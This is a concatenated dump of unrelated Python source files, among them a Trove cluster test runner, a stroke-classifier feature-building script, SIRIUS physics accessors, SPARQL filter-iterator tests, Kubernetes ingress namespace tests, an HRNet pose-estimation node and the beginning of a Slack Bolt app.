expected_instance_states=expected_instance_states,
expected_http_code=expected_http_code)
def run_cluster_shrink(self):
raise SkipTest("Operation not supported by the datastore.")
def run_cluster_grow(self):
raise SkipTest("Operation not supported by the datastore.")
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('min_cluster_member_count')
class VerticaClusterActionsRunner(ClusterActionsRunner):
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('cluster_member_count')
class RedisClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class MongodbClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
@property
def min_cluster_node_count(self):
return 3
class CouchbaseClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.") | 0.541894 | 0.340787 |
import numpy as np
import os
import csv
import sys
import MySQLdb
import scipy.stats as stats
from collections import defaultdict
import scipy as sp
from scipy import stats
from sklearn.externals import joblib
from sklearn import metrics
from sklearn import ensemble
from sklearn import linear_model
from sklearn import model_selection
from sklearn import preprocessing
from sklearn import svm
from scipy.sparse import csr_matrix
import pickle
import time
import datetime
from datetime import date
e2e={}
case=sys.argv[1]
control=sys.argv[2]
model=sys.argv[3]
print "new loop start", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
def credential():
'''import login and passwrd from credential text file'''
reader=csv.reader(open({credentials filename}),delimiter = ",")
for login, password in reader:
login=login
passwd=password
return login, passwd
login,passwd=credential()
print "first entrance to mysql", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
db = MySQLdb.connect(host={host}, user ='%s' % (login), passwd='%s' % (passwd), db={database}, port={poat})
c = db.cursor()
cid2icd=dict()
cond_file={condition events filename}+case+control+'.npy'
cond_events=np.load(cond_file)
cond_events=cond_events.tolist()
#gather ICD9 or ICD10 codes of conditions
SQL='''select condition_source_value icd, condition_source_concept_id cid from {condition occurrence table} where condition_source_concept_id in %s''' %str(tuple(cond_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
#snomed concept id,
for cond in cond_events:
if cond in cid2icd.keys():
cond=cid2icd[cond]
ocond=cond
if cond[0:3]=='I9:':
print cond
cond=cond.split(':')[1]
elif cond[0:4]=='I10:':
cond=cond.split(':')[1]
e2e[cond]=ocond
proc_file={procedure events filename}+case+control+'.npy'
proc_events=np.load(proc_file)
proc_events=proc_events.tolist()
#Gather ICD9 or ICD10 codes of procedures
SQL='''select procedure_source_value icd, procedure_source_concept_id cid from {procedure occurrence table} where procedure_source_concept_id in %s''' %str(tuple(proc_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
for proc in proc_events:
if proc in cid2icd.keys():
proc=cid2icd[proc]
oproc=proc
if proc[0:3]=='I9:':
proc=proc.split(':')[1]
elif proc[0:4]=='I10:':
proc=proc.split(':')[1]
elif proc[0:3]=='C4:':
proc=proc.split(':')[1]
e2e[proc]=oproc
e2e_file={events2uniformevents filename}+case+control+'.npy'
np.save(e2e_file,e2e)
drug_file={drug era events filename}+case+control+'.npy'
drug_events=np.load(drug_file)
drug_events=drug_events.tolist()
e2i_file={events2cols filename}+case+control+'.npy'
e2i=np.load(e2i_file)
e2i=e2i[()]
matrix_file={training_set matrix filename} + case + control + '.npz'
matrix=sp.sparse.load_npz(matrix_file).toarray()
#load dictionary of feature collapsing models based on CCS+ATC combination
dictfile=model+'2code.npy'
ccs2code=np.load(dictfile)
ccs2code=ccs2code[()]
if model=='cat':
model2='chem_substrs'
if model=='lvl1_':
model2='anatoms'
if model=='lvl2_':
model2='pharm_subgrps'
drugdictfile=model2+'2code.npy'
drug2code=np.load(drugdictfile)
drug2code=drug2code[()]
demo_file={demographics filename}+case+control+'.npy'
demo_events=np.load(demo_file)
demo_events=demo_events.tolist()
#matrix of collapsed features
model_mat=np.zeros(shape=(matrix.shape[0],len(ccs2code.keys())+len(drug2code.keys())+len(demo_events))).astype('int8')
keys=ccs2code.keys()
for i in range(0,len(keys)):
events=ccs2code[keys[i]]
for e in events:
if e in e2e.keys():
if e2e[e] in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e2e[e]])]
dkeys=drug2code.keys()
for i in range(len(keys),len(keys)+len(dkeys)):
events=drug2code[dkeys[i-len(keys)]]
for e in events:
if e in drug_events:
if e in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e])]
#add demo events
for i in range(len(keys)+len(dkeys),len(keys)+len(dkeys)+len(demo_events)):
events=demo_events
for e in events:
if e in e2i.keys():
model_mat[:,i]=matrix[:,int(e2i[e])]
C_val = 1
examples=csr_matrix(model_mat)
mat_file={insert matrix filename}+model+model2+case+control+'.npz'
sp.sparse.save_npz(mat_file,examples)
print "end", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') | src/train_collapse_stroke_classifier_both.py | import numpy as np
import os
import csv
import sys
import MySQLdb
import scipy.stats as stats
from collections import defaultdict
import scipy as sp
from scipy import stats
from sklearn.externals import joblib
from sklearn import metrics
from sklearn import ensemble
from sklearn import linear_model
from sklearn import model_selection
from sklearn import preprocessing
from sklearn import svm
from scipy.sparse import csr_matrix
import pickle
import time
import datetime
from datetime import date
e2e={}
case=sys.argv[1]
control=sys.argv[2]
model=sys.argv[3]
print "new loop start", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
def credential():
'''import login and passwrd from credential text file'''
reader=csv.reader(open({credentials filename}),delimiter = ",")
for login, password in reader:
login=login
passwd=password
return login, passwd
login,passwd=credential()
print "first entrance to mysql", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
db = MySQLdb.connect(host={host}, user ='%s' % (login), passwd='%s' % (passwd), db={database}, port={poat})
c = db.cursor()
cid2icd=dict()
cond_file={condition events filename}+case+control+'.npy'
cond_events=np.load(cond_file)
cond_events=cond_events.tolist()
#gather ICD9 or ICD10 codes of conditions
SQL='''select condition_source_value icd, condition_source_concept_id cid from {condition occurrence table} where condition_source_concept_id in %s''' %str(tuple(cond_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
#snomed concept id,
for cond in cond_events:
if cond in cid2icd.keys():
cond=cid2icd[cond]
ocond=cond
if cond[0:3]=='I9:':
print cond
cond=cond.split(':')[1]
elif cond[0:4]=='I10:':
cond=cond.split(':')[1]
e2e[cond]=ocond
proc_file={procedure events filename}+case+control+'.npy'
proc_events=np.load(proc_file)
proc_events=proc_events.tolist()
#Gather ICD9 or ICD10 codes of procedures
SQL='''select procedure_source_value icd, procedure_source_concept_id cid from {procedure occurrence table} where procedure_source_concept_id in %s''' %str(tuple(proc_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
for proc in proc_events:
if proc in cid2icd.keys():
proc=cid2icd[proc]
oproc=proc
if proc[0:3]=='I9:':
proc=proc.split(':')[1]
elif proc[0:4]=='I10:':
proc=proc.split(':')[1]
elif proc[0:3]=='C4:':
proc=proc.split(':')[1]
e2e[proc]=oproc
e2e_file={events2uniformevents filename}+case+control+'.npy'
np.save(e2e_file,e2e)
drug_file={drug era events filename}+case+control+'.npy'
drug_events=np.load(drug_file)
drug_events=drug_events.tolist()
e2i_file={events2cols filename}+case+control+'.npy'
e2i=np.load(e2i_file)
e2i=e2i[()]
matrix_file={training_set matrix filename} + case + control + '.npz'
matrix=sp.sparse.load_npz(matrix_file).toarray()
#load dictionary of feature collapsing models based on CCS+ATC combination
dictfile=model+'2code.npy'
ccs2code=np.load(dictfile)
ccs2code=ccs2code[()]
if model=='cat':
model2='chem_substrs'
if model=='lvl1_':
model2='anatoms'
if model=='lvl2_':
model2='pharm_subgrps'
drugdictfile=model2+'2code.npy'
drug2code=np.load(drugdictfile)
drug2code=drug2code[()]
demo_file={demographics filename}+case+control+'.npy'
demo_events=np.load(demo_file)
demo_events=demo_events.tolist()
#matrix of collapsed features
model_mat=np.zeros(shape=(matrix.shape[0],len(ccs2code.keys())+len(drug2code.keys())+len(demo_events))).astype('int8')
keys=ccs2code.keys()
for i in range(0,len(keys)):
events=ccs2code[keys[i]]
for e in events:
if e in e2e.keys():
if e2e[e] in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e2e[e]])]
dkeys=drug2code.keys()
for i in range(len(keys),len(keys)+len(dkeys)):
events=drug2code[dkeys[i-len(keys)]]
for e in events:
if e in drug_events:
if e in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e])]
#add demo events
for i in range(len(keys)+len(dkeys),len(keys)+len(dkeys)+len(demo_events)):
events=demo_events
for e in events:
if e in e2i.keys():
model_mat[:,i]=matrix[:,int(e2i[e])]
C_val = 1
examples=csr_matrix(model_mat)
mat_file={insert matrix filename}+model+model2+case+control+'.npz'
sp.sparse.save_npz(mat_file,examples)
print "end", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') | 0.069101 | 0.136983 |
from .helpers import *
from .coefficient_array import CoefficientArray, PwCoeffs
from .py_sirius import *
from .py_sirius import K_point_set, Density
from .logger import Logger
from .operators import S_operator
import numpy as np
from numpy import array, zeros
__all__ = ["ot", "baarman", "bands", "edft"]
class OccupancyDescriptor(object):
"""
Accessor for occupation numbers
"""
def __set__(self, instance, value):
for key, v in value._data.items():
k, ispn = key
# append with zeros if necessary
nb = instance.ctx().num_bands()
f = zeros(nb)
ll = list(array(v).flatten())
f[:len(ll)] = ll
instance[k].set_band_occupancy(ispn, f)
instance.sync_band_occupancies()
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].band_occupancy(ispn))
return out
class PWDescriptor(object):
"""
Accessor for wave-function coefficients
"""
def __set__(self, instance, value):
from .helpers import store_pw_coeffs
store_pw_coeffs(instance, value)
def __get__(self, instance, owner):
return PwCoeffs(instance)
class KPointWeightDescriptor(object):
"""
Accessor for k-point weights
"""
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].weight())
return out
class BandEnergiesDescriptor(object):
"""
Accessor for band energies
"""
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].band_energies(ispn))
return out
def __set__(self, instance, value):
for key, val in value._data.items():
k, ispn = key
for j, v in enumerate(val):
instance[k].set_band_energy(j, ispn, v)
instance.sync_band_energies()
class DensityDescriptor(object):
def __init__(self, i):
self.i = i
def __get__(self, instance, owner):
return np.array(instance.f_pw_local(self.i))
def __set__(self, instance, value):
instance.f_pw_local(self.i)[:] = value
K_point_set.fn = OccupancyDescriptor()
K_point_set.C = PWDescriptor()
K_point_set.w = KPointWeightDescriptor()
K_point_set.e = BandEnergiesDescriptor()
Density.rho = DensityDescriptor(0)
Density.mx = DensityDescriptor(1)
Density.my = DensityDescriptor(2)
Density.mz = DensityDescriptor(3) | python_module/sirius/__init__.py | from .helpers import *
from .coefficient_array import CoefficientArray, PwCoeffs
from .py_sirius import *
from .py_sirius import K_point_set, Density
from .logger import Logger
from .operators import S_operator
import numpy as np
from numpy import array, zeros
__all__ = ["ot", "baarman", "bands", "edft"]
class OccupancyDescriptor(object):
"""
Accessor for occupation numbers
"""
def __set__(self, instance, value):
for key, v in value._data.items():
k, ispn = key
# append with zeros if necessary
nb = instance.ctx().num_bands()
f = zeros(nb)
ll = list(array(v).flatten())
f[:len(ll)] = ll
instance[k].set_band_occupancy(ispn, f)
instance.sync_band_occupancies()
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].band_occupancy(ispn))
return out
class PWDescriptor(object):
"""
Accessor for wave-function coefficients
"""
def __set__(self, instance, value):
from .helpers import store_pw_coeffs
store_pw_coeffs(instance, value)
def __get__(self, instance, owner):
return PwCoeffs(instance)
class KPointWeightDescriptor(object):
"""
Accessor for k-point weights
"""
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].weight())
return out
class BandEnergiesDescriptor(object):
"""
Accessor for band energies
"""
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].band_energies(ispn))
return out
def __set__(self, instance, value):
for key, val in value._data.items():
k, ispn = key
for j, v in enumerate(val):
instance[k].set_band_energy(j, ispn, v)
instance.sync_band_energies()
class DensityDescriptor(object):
def __init__(self, i):
self.i = i
def __get__(self, instance, owner):
return np.array(instance.f_pw_local(self.i))
def __set__(self, instance, value):
instance.f_pw_local(self.i)[:] = value
K_point_set.fn = OccupancyDescriptor()
K_point_set.C = PWDescriptor()
K_point_set.w = KPointWeightDescriptor()
K_point_set.e = BandEnergiesDescriptor()
Density.rho = DensityDescriptor(0)
Density.mx = DensityDescriptor(1)
Density.my = DensityDescriptor(2)
Density.mz = DensityDescriptor(3) | 0.558086 | 0.159872 |
from query_engine.sage_engine import SageEngine
from query_engine.iterators.scan import ScanIterator
from query_engine.iterators.filter import FilterIterator
from query_engine.iterators.projection import ProjectionIterator
from query_engine.iterators.loader import load
from database.hdt_file_connector import HDTFileConnector
from tests.utils import DummyDataset
import math
hdtDoc = HDTFileConnector('tests/data/watdiv.10M.hdt')
engine = SageEngine()
triple = {
'subject': 'http://db.uwaterloo.ca/~galuc/wsdbm/Offer1000',
'predicate': '?p',
'object': '?o',
'graph': 'watdiv100'
}
def test_simple_filter_iterator():
expression = "?p = <http://schema.org/eligibleRegion>"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
def test_and_or_filter_iterator():
expression = "?p = <http://schema.org/eligibleRegion> && (?o = <http://db.uwaterloo.ca/~galuc/wsdbm/Country0> || ?o = <http://db.uwaterloo.ca/~galuc/wsdbm/Country9>)"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 2
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
def test_operation_filter_iterator():
expression = "10 = 5 * 2"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 9
def test_function_filter_iterator():
expression = '?p = <http://purl.org/goodrelations/price> && isLiteral(?o) && !isNumeric(?o)'
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 1
def test_filter_iterator_interrupt():
expression = "?p = <http://schema.org/eligibleRegion>"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, 10e-7)
assert len(results) <= 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
tmp = len(results)
reloaded = load(saved.SerializeToString(), DummyDataset(hdtDoc, 'watdiv100'))
(results, saved, done) = engine.execute(reloaded, 10e7)
assert len(results) + tmp == 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
assert done | tests/iterators/filter_iterator_test.py | from query_engine.sage_engine import SageEngine
from query_engine.iterators.scan import ScanIterator
from query_engine.iterators.filter import FilterIterator
from query_engine.iterators.projection import ProjectionIterator
from query_engine.iterators.loader import load
from database.hdt_file_connector import HDTFileConnector
from tests.utils import DummyDataset
import math
hdtDoc = HDTFileConnector('tests/data/watdiv.10M.hdt')
engine = SageEngine()
triple = {
'subject': 'http://db.uwaterloo.ca/~galuc/wsdbm/Offer1000',
'predicate': '?p',
'object': '?o',
'graph': 'watdiv100'
}
def test_simple_filter_iterator():
expression = "?p = <http://schema.org/eligibleRegion>"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
def test_and_or_filter_iterator():
expression = "?p = <http://schema.org/eligibleRegion> && (?o = <http://db.uwaterloo.ca/~galuc/wsdbm/Country0> || ?o = <http://db.uwaterloo.ca/~galuc/wsdbm/Country9>)"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 2
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
def test_operation_filter_iterator():
expression = "10 = 5 * 2"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 9
def test_function_filter_iterator():
expression = '?p = <http://purl.org/goodrelations/price> && isLiteral(?o) && !isNumeric(?o)'
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, math.inf)
assert len(results) == 1
def test_filter_iterator_interrupt():
expression = "?p = <http://schema.org/eligibleRegion>"
iterator, card = hdtDoc.search_triples(triple['subject'], triple['predicate'], triple['object'])
scan = ProjectionIterator(ScanIterator(iterator, triple, card))
iterator = FilterIterator(scan, expression)
(results, saved, done) = engine.execute(iterator, 10e-7)
assert len(results) <= 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
tmp = len(results)
reloaded = load(saved.SerializeToString(), DummyDataset(hdtDoc, 'watdiv100'))
(results, saved, done) = engine.execute(reloaded, 10e7)
assert len(results) + tmp == 4
for b in results:
assert b['?p'] == 'http://schema.org/eligibleRegion'
assert b['?o'] in [
'http://db.uwaterloo.ca/~galuc/wsdbm/Country0',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country1',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country4',
'http://db.uwaterloo.ca/~galuc/wsdbm/Country9'
]
assert done | 0.654784 | 0.344554 |
import requests
import pytest
from suite.resources_utils import ensure_connection_to_public_endpoint, create_items_from_yaml, create_example_app, \
wait_until_all_pods_are_ready, ensure_response_from_backend, create_namespace_with_name_from_yaml, delete_namespace
from suite.yaml_utils import get_first_ingress_host_from_yaml
from settings import TEST_DATA
class BackendSetup:
"""
Encapsulate the example details.
Attributes:
req_url (str):
ingress_hosts (dict):
"""
def __init__(self, req_url, ingress_hosts):
self.req_url = req_url
self.ingress_hosts = ingress_hosts
@pytest.fixture(scope="class")
def backend_setup(request, kube_apis, ingress_controller_endpoint) -> BackendSetup:
"""
Create 2 namespaces and deploy simple applications in them.
:param request: pytest fixture
:param kube_apis: client apis
:param ingress_controller_endpoint: public endpoint
:return: BackendSetup
"""
watched_namespace = create_namespace_with_name_from_yaml(kube_apis.v1,
f"watched-ns", f"{TEST_DATA}/common/ns.yaml")
foreign_namespace = create_namespace_with_name_from_yaml(kube_apis.v1,
f"foreign-ns", f"{TEST_DATA}/common/ns.yaml")
ingress_hosts = {}
for ns in [watched_namespace, foreign_namespace]:
print(f"------------------------- Deploy the backend in {ns} -----------------------------------")
create_example_app(kube_apis, "simple", ns)
src_ing_yaml = f"{TEST_DATA}/watch-namespace/{ns}-ingress.yaml"
create_items_from_yaml(kube_apis, src_ing_yaml, ns)
ingress_host = get_first_ingress_host_from_yaml(src_ing_yaml)
ingress_hosts[f"{ns}-ingress"] = ingress_host
req_url = f"http://{ingress_controller_endpoint.public_ip}:{ingress_controller_endpoint.port}/backend1"
wait_until_all_pods_are_ready(kube_apis.v1, ns)
ensure_connection_to_public_endpoint(ingress_controller_endpoint.public_ip,
ingress_controller_endpoint.port,
ingress_controller_endpoint.port_ssl)
def fin():
print("Clean up:")
delete_namespace(kube_apis.v1, watched_namespace)
delete_namespace(kube_apis.v1, foreign_namespace)
request.addfinalizer(fin)
return BackendSetup(req_url, ingress_hosts)
@pytest.mark.ingresses
@pytest.mark.parametrize('ingress_controller, expected_responses',
[
pytest.param({"extra_args": ["-watch-namespace=watched-ns"]},
{"watched-ns-ingress": 200, "foreign-ns-ingress": 404})
],
indirect=["ingress_controller"])
class TestWatchNamespace:
def test_response_codes(self, ingress_controller, backend_setup, expected_responses):
for ing in ["watched-ns-ingress", "foreign-ns-ingress"]:
ensure_response_from_backend(backend_setup.req_url, backend_setup.ingress_hosts[ing])
resp = requests.get(backend_setup.req_url, headers={"host": backend_setup.ingress_hosts[ing]})
assert resp.status_code == expected_responses[ing],\
f"Expected: {expected_responses[ing]} response code for {backend_setup.ingress_hosts[ing]}" | tests/suite/test_watch_namespace.py | import requests
import pytest
from suite.resources_utils import ensure_connection_to_public_endpoint, create_items_from_yaml, create_example_app, \
wait_until_all_pods_are_ready, ensure_response_from_backend, create_namespace_with_name_from_yaml, delete_namespace
from suite.yaml_utils import get_first_ingress_host_from_yaml
from settings import TEST_DATA
class BackendSetup:
"""
Encapsulate the example details.
Attributes:
req_url (str):
ingress_hosts (dict):
"""
def __init__(self, req_url, ingress_hosts):
self.req_url = req_url
self.ingress_hosts = ingress_hosts
@pytest.fixture(scope="class")
def backend_setup(request, kube_apis, ingress_controller_endpoint) -> BackendSetup:
"""
Create 2 namespaces and deploy simple applications in them.
:param request: pytest fixture
:param kube_apis: client apis
:param ingress_controller_endpoint: public endpoint
:return: BackendSetup
"""
watched_namespace = create_namespace_with_name_from_yaml(kube_apis.v1,
f"watched-ns", f"{TEST_DATA}/common/ns.yaml")
foreign_namespace = create_namespace_with_name_from_yaml(kube_apis.v1,
f"foreign-ns", f"{TEST_DATA}/common/ns.yaml")
ingress_hosts = {}
for ns in [watched_namespace, foreign_namespace]:
print(f"------------------------- Deploy the backend in {ns} -----------------------------------")
create_example_app(kube_apis, "simple", ns)
src_ing_yaml = f"{TEST_DATA}/watch-namespace/{ns}-ingress.yaml"
create_items_from_yaml(kube_apis, src_ing_yaml, ns)
ingress_host = get_first_ingress_host_from_yaml(src_ing_yaml)
ingress_hosts[f"{ns}-ingress"] = ingress_host
req_url = f"http://{ingress_controller_endpoint.public_ip}:{ingress_controller_endpoint.port}/backend1"
wait_until_all_pods_are_ready(kube_apis.v1, ns)
ensure_connection_to_public_endpoint(ingress_controller_endpoint.public_ip,
ingress_controller_endpoint.port,
ingress_controller_endpoint.port_ssl)
def fin():
print("Clean up:")
delete_namespace(kube_apis.v1, watched_namespace)
delete_namespace(kube_apis.v1, foreign_namespace)
request.addfinalizer(fin)
return BackendSetup(req_url, ingress_hosts)
@pytest.mark.ingresses
@pytest.mark.parametrize('ingress_controller, expected_responses',
[
pytest.param({"extra_args": ["-watch-namespace=watched-ns"]},
{"watched-ns-ingress": 200, "foreign-ns-ingress": 404})
],
indirect=["ingress_controller"])
class TestWatchNamespace:
def test_response_codes(self, ingress_controller, backend_setup, expected_responses):
for ing in ["watched-ns-ingress", "foreign-ns-ingress"]:
ensure_response_from_backend(backend_setup.req_url, backend_setup.ingress_hosts[ing])
resp = requests.get(backend_setup.req_url, headers={"host": backend_setup.ingress_hosts[ing]})
assert resp.status_code == expected_responses[ing],\
f"Expected: {expected_responses[ing]} response code for {backend_setup.ingress_hosts[ing]}" | 0.591841 | 0.341775 |
from typing import Any, Dict
from peekingduck.pipeline.nodes.abstract_node import AbstractNode
from peekingduck.pipeline.nodes.model.hrnetv1 import hrnet_model
class Node(AbstractNode):
"""Initializes and uses HRNet model to infer poses from detected bboxes.
Note that HRNet must be used in conjunction with an object detector applied
prior.
The HRNet applied to human pose estimation uses the representation head,
called HRNetV1.
The HRNet node is capable of detecting single human figures simultaneously
per inference, with 17 keypoints estimated for each detected human figure.
The keypoint indices table can be found
:ref:`here <whole-body-keypoint-ids>`.
Inputs:
|img_data|
|bboxes_data|
Outputs:
|keypoints_data|
|keypoint_scores_data|
|keypoint_conns_data|
Configs:
weights_parent_dir (:obj:`Optional[str]`): **default = null**. |br|
Change the parent directory where weights will be stored by
replacing ``null`` with an absolute path to the desired directory.
resolution (:obj:`Dict`):
**default = { height: 192, width: 256 }**. |br|
Resolution of input array to HRNet model.
score_threshold (:obj:`float`): **[0, 1], default = 0.1**. |br|
Threshold to determine if detection should be returned
References:
Deep High-Resolution Representation Learning for Visual Recognition:
https://arxiv.org/abs/1908.07919
"""
def __init__(self, config: Dict[str, Any] = None, **kwargs: Any) -> None:
super().__init__(config, node_path=__name__, **kwargs)
self.model = hrnet_model.HRNetModel(self.config)
def run(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
"""Reads the bbox input and returns the poses and pose bbox of the
specified objects chosen to be detected.
"""
keypoints, keypoint_scores, keypoint_conns = self.model.predict(
inputs["img"], inputs["bboxes"]
)
outputs = {
"keypoints": keypoints,
"keypoint_scores": keypoint_scores,
"keypoint_conns": keypoint_conns,
}
return outputs | peekingduck/pipeline/nodes/model/hrnet.py | from typing import Any, Dict
from peekingduck.pipeline.nodes.abstract_node import AbstractNode
from peekingduck.pipeline.nodes.model.hrnetv1 import hrnet_model
class Node(AbstractNode):
"""Initializes and uses HRNet model to infer poses from detected bboxes.
Note that HRNet must be used in conjunction with an object detector applied
prior.
The HRNet applied to human pose estimation uses the representation head,
called HRNetV1.
The HRNet node is capable of detecting single human figures simultaneously
per inference, with 17 keypoints estimated for each detected human figure.
The keypoint indices table can be found
:ref:`here <whole-body-keypoint-ids>`.
Inputs:
|img_data|
|bboxes_data|
Outputs:
|keypoints_data|
|keypoint_scores_data|
|keypoint_conns_data|
Configs:
weights_parent_dir (:obj:`Optional[str]`): **default = null**. |br|
Change the parent directory where weights will be stored by
replacing ``null`` with an absolute path to the desired directory.
resolution (:obj:`Dict`):
**default = { height: 192, width: 256 }**. |br|
Resolution of input array to HRNet model.
score_threshold (:obj:`float`): **[0, 1], default = 0.1**. |br|
Threshold to determine if detection should be returned
References:
Deep High-Resolution Representation Learning for Visual Recognition:
https://arxiv.org/abs/1908.07919
"""
def __init__(self, config: Dict[str, Any] = None, **kwargs: Any) -> None:
super().__init__(config, node_path=__name__, **kwargs)
self.model = hrnet_model.HRNetModel(self.config)
def run(self, inputs: Dict[str, Any]) -> Dict[str, Any]:
"""Reads the bbox input and returns the poses and pose bbox of the
specified objects chosen to be detected.
"""
keypoints, keypoint_scores, keypoint_conns = self.model.predict(
inputs["img"], inputs["bboxes"]
)
outputs = {
"keypoints": keypoints,
"keypoint_scores": keypoint_scores,
"keypoint_conns": keypoint_conns,
}
return outputs | 0.946026 | 0.535706 |
import sys
sys.path.insert(1, "../..")
# ------------------------------------------------
import logging
from slack_sdk.web.async_client import AsyncSlackResponse, AsyncWebClient
from slack_bolt.async_app import AsyncApp, AsyncAck
logging.basicConfig(level=logging.DEBUG)
# export SLACK_SIGNING_SECRET=***
